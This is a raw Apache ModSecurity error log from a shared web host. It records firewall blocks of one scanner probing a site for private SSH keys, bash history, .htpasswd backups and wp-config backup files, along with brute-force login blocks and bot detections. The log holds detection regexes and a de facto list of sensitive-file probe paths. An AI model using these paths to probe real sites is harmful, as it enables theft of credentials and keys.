[Tue May 26 13:05:41.857743 2026] [security2:error] [pid 485064:tid 485123] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.htaccess.old"] [unique_id "ahVNTT9tlF55stOmSqEMfAABADo"]
[Tue May 26 13:05:42.040019 2026] [security2:error] [pid 485064:tid 485189] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.htpasswd.bak"] [unique_id "ahVNTj9tlF55stOmSqEMgAAAzXw"]
[Tue May 26 13:05:43.284687 2026] [security2:error] [pid 485064:tid 485276] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNTj9tlF55stOmSqEMoAAAANc"]
[Tue May 26 13:05:44.956681 2026] [security2:error] [pid 485064:tid 485185] [remote 211.23.68.235:64455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVNUD9tlF55stOmSqEM5gAA-ng"]
[Tue May 26 13:05:45.759847 2026] [security2:error] [pid 485064:tid 485203] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNUT9tlF55stOmSqENBgAAAI4"]
[Tue May 26 13:05:46.899909 2026] [security2:error] [pid 485064:tid 485222] [client 74.7.244.7:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahVNUD9tlF55stOmSqEM9AAAAKE"]
[Tue May 26 13:05:46.901073 2026] [security2:error] [pid 485064:tid 485239] [client 74.7.244.7:33720] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.kardashevtechnologies.com"] [uri "/robots.txt"] [unique_id "ahVNUD9tlF55stOmSqEM8gAAsnc"]
[Tue May 26 13:05:47.821519 2026] [autoindex:error] [pid 485064:tid 485215] [client 198.235.24.213:57926] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:05:47.846001 2026] [security2:error] [pid 485064:tid 485227] [client 173.209.63.146:59077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.63.209.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php/wp-login.php"] [unique_id "ahVNUz9tlF55stOmSqENVQAAAKY"]
[Tue May 26 13:05:47.906664 2026] [security2:error] [pid 485064:tid 485188] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.ssh/id_rsa"] [unique_id "ahVNUz9tlF55stOmSqENYAAAtHs"]
[Tue May 26 13:05:48.295208 2026] [security2:error] [pid 485064:tid 485297] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNUz9tlF55stOmSqENXwAAAOw"]
[Tue May 26 13:05:48.673234 2026] [security2:error] [pid 485064:tid 485176] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.bash_history"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.bash_history"] [unique_id "ahVNVD9tlF55stOmSqENeQAAkW8"]
[Tue May 26 13:05:50.318795 2026] [security2:error] [pid 485064:tid 485320] [client 157.20.138.61:50550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNVj9tlF55stOmSqENvAAAAQM"]
[Tue May 26 13:05:50.319002 2026] [security2:error] [pid 485064:tid 485320] [client 157.20.138.61:50550] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNVj9tlF55stOmSqENvAAAAQM"]
[Tue May 26 13:05:50.551101 2026] [security2:error] [pid 485064:tid 485201] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNVj9tlF55stOmSqENuwAAAIw"]
[Tue May 26 13:05:51.034655 2026] [security2:error] [pid 485064:tid 485068] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config.php"] [unique_id "ahVNVz9tlF55stOmSqEN4QAAqgM"]
[Tue May 26 13:05:52.183843 2026] [security2:error] [pid 485064:tid 485264] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNVz9tlF55stOmSqEOAAAAAMs"]
[Tue May 26 13:05:52.940734 2026] [security2:error] [pid 485064:tid 485084] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config.inc.php"] [unique_id "ahVNWD9tlF55stOmSqEOKgAAoxM"]
[Tue May 26 13:05:53.123668 2026] [security2:error] [pid 485064:tid 485174] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/config.old"] [unique_id "ahVNWT9tlF55stOmSqEOLgAA5W0"]
[Tue May 26 13:05:53.305147 2026] [security2:error] [pid 485064:tid 485091] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/config.bak"] [unique_id "ahVNWT9tlF55stOmSqEOOQAAsho"]
[Tue May 26 13:05:53.487473 2026] [security2:error] [pid 485064:tid 485112] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/config.backup"] [unique_id "ahVNWT9tlF55stOmSqEOPwAAyC8"]
[Tue May 26 13:05:54.026572 2026] [proxy:warn] [pid 485064:tid 485251] [client 45.33.14.5:59924] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 13:05:55.263938 2026] [security2:error] [pid 485064:tid 485288] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNWj9tlF55stOmSqEOcgAAAOM"]
[Tue May 26 13:05:55.455411 2026] [security2:error] [pid 485064:tid 485088] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/database.php"] [unique_id "ahVNWz9tlF55stOmSqEOjAAAhxc"]
[Tue May 26 13:05:55.635939 2026] [security2:error] [pid 485064:tid 485123] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/app.php"] [unique_id "ahVNWz9tlF55stOmSqEOjQAA9jo"]
[Tue May 26 13:05:55.652121 2026] [security2:error] [pid 485064:tid 485273] [client 45.33.14.5:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVNWj9tlF55stOmSqEOVQAAANQ"]
[Tue May 26 13:05:55.652849 2026] [security2:error] [pid 485064:tid 485251] [client 45.33.14.5:59924] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/400.shtml"] [unique_id "ahVNWj9tlF55stOmSqEOUQAAAL4"]
[Tue May 26 13:05:55.816423 2026] [security2:error] [pid 485064:tid 485189] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/auth.php"] [unique_id "ahVNWz9tlF55stOmSqEOkgAAuHw"]
[Tue May 26 13:05:55.996850 2026] [security2:error] [pid 485064:tid 485076] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/mail.php"] [unique_id "ahVNWz9tlF55stOmSqEOmQAAygs"]
[Tue May 26 13:05:56.177807 2026] [security2:error] [pid 485064:tid 485169] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/services.php"] [unique_id "ahVNXD9tlF55stOmSqEOnQAAz2g"]
[Tue May 26 13:05:56.358901 2026] [security2:error] [pid 485064:tid 485110] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/queue.php"] [unique_id "ahVNXD9tlF55stOmSqEOngAAhS0"]
[Tue May 26 13:05:56.539588 2026] [security2:error] [pid 485064:tid 485085] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/cache.php"] [unique_id "ahVNXD9tlF55stOmSqEOpQAA6hQ"]
[Tue May 26 13:05:56.720669 2026] [security2:error] [pid 485064:tid 485119] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/session.php"] [unique_id "ahVNXD9tlF55stOmSqEOqQAAtzY"]
[Tue May 26 13:05:56.902484 2026] [security2:error] [pid 485064:tid 485083] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/logging.php"] [unique_id "ahVNXD9tlF55stOmSqEOsgAAxxI"]
[Tue May 26 13:05:57.083123 2026] [security2:error] [pid 485064:tid 485111] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/filesystems.php"] [unique_id "ahVNXT9tlF55stOmSqEOtwABAi4"]
[Tue May 26 13:05:57.263385 2026] [security2:error] [pid 485064:tid 485101] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/broadcasting.php"] [unique_id "ahVNXT9tlF55stOmSqEOvgAA4yQ"]
[Tue May 26 13:05:57.443768 2026] [security2:error] [pid 485064:tid 485116] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/cors.php"] [unique_id "ahVNXT9tlF55stOmSqEOwgAA_TM"]
[Tue May 26 13:05:57.833733 2026] [security2:error] [pid 485064:tid 485114] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/configuration.php"] [unique_id "ahVNXT9tlF55stOmSqEO2QAA8TE"]
[Tue May 26 13:05:58.246334 2026] [security2:error] [pid 485064:tid 485298] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNXT9tlF55stOmSqEO2AAAAO0"]
[Tue May 26 13:05:58.585072 2026] [security2:error] [pid 485064:tid 485126] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/settings.php"] [unique_id "ahVNXj9tlF55stOmSqEO9gAAkj0"]
[Tue May 26 13:06:00.048442 2026] [security2:error] [pid 485064:tid 485243] [client 114.119.137.184:21053] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/blog/category/wellhead/"] [unique_id "ahVNYD9tlF55stOmSqEPIQAAALY"], referer: http://rohiniventures.com/blog/category/wellhead/
[Tue May 26 13:06:00.107089 2026] [autoindex:error] [pid 485064:tid 485203] [client 31.220.88.107:59567] AH01276: Cannot serve directory /home2/svijakqj/siliconelevators.in/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 13:06:00.133665 2026] [security2:error] [pid 485064:tid 485136] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-config.php"] [unique_id "ahVNYD9tlF55stOmSqEPJwAA7Uc"]
[Tue May 26 13:06:00.158965 2026] [security2:error] [pid 485064:tid 485311] [client 45.79.5.11:52643] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cuatrodoce.com.mx"] [uri "/index.php"] [unique_id "ahVNXz9tlF55stOmSqEO_wAAAPo"]
[Tue May 26 13:06:00.205827 2026] [security2:error] [pid 485064:tid 485309] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNXz9tlF55stOmSqEPGgAAAPg"]
[Tue May 26 13:06:00.240601 2026] [security2:error] [pid 485064:tid 485299] [client 74.249.173.207:4326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/wk/index.php"] [unique_id "ahVNYD9tlF55stOmSqEPKgAAAO4"]
[Tue May 26 13:06:00.313618 2026] [security2:error] [pid 485064:tid 485129] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "samayikprasanga.in"] [uri "/wp-config.php.bak"] [unique_id "ahVNYD9tlF55stOmSqEPKwAAqkA"]
[Tue May 26 13:06:00.493577 2026] [security2:error] [pid 485064:tid 485158] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "samayikprasanga.in"] [uri "/wp-config.php.old"] [unique_id "ahVNYD9tlF55stOmSqEPMgABBF0"]
[Tue May 26 13:06:00.594114 2026] [security2:error] [pid 485064:tid 485225] [client 157.20.138.61:50652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNYD9tlF55stOmSqEPNgAAAKQ"]
[Tue May 26 13:06:00.594242 2026] [security2:error] [pid 485064:tid 485225] [client 157.20.138.61:50652] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNYD9tlF55stOmSqEPNgAAAKQ"]
[Tue May 26 13:06:00.673419 2026] [security2:error] [pid 485064:tid 485138] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "samayikprasanga.in"] [uri "/wp-config.php.save"] [unique_id "ahVNYD9tlF55stOmSqEPOgABAUk"]
[Tue May 26 13:06:00.853307 2026] [security2:error] [pid 485064:tid 485137] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "samayikprasanga.in"] [uri "/wp-config.php.swp"] [unique_id "ahVNYD9tlF55stOmSqEPQQAA_Ug"]
[Tue May 26 13:06:01.033379 2026] [security2:error] [pid 485064:tid 485143] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "samayikprasanga.in"] [uri "/wp-config.php.orig"] [unique_id "ahVNYT9tlF55stOmSqEPQgAAlE4"]
[Tue May 26 13:06:01.213523 2026] [security2:error] [pid 485064:tid 485152] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "samayikprasanga.in"] [uri "/wp-config.php.txt"] [unique_id "ahVNYT9tlF55stOmSqEPSQAAkFc"]
[Tue May 26 13:06:01.287945 2026] [security2:error] [pid 485064:tid 485280] [client 114.119.138.154:47945] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "politica-global.com"] [uri "/"] [unique_id "ahVNYT9tlF55stOmSqEPSgAAANs"], referer: https://8coint.com/list.php?part=2025/09/26/93
[Tue May 26 13:06:01.393680 2026] [security2:error] [pid 485064:tid 485192] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "samayikprasanga.in"] [uri "/wp-config.php~"] [unique_id "ahVNYT9tlF55stOmSqEPTwAAyX8"]
[Tue May 26 13:06:01.574218 2026] [security2:error] [pid 485064:tid 485164] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-config-sample.php"] [unique_id "ahVNYT9tlF55stOmSqEPUgAAoWM"]
[Tue May 26 13:06:01.839904 2026] [security2:error] [pid 485064:tid 485283] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNYT9tlF55stOmSqEPTgAAAN4"]
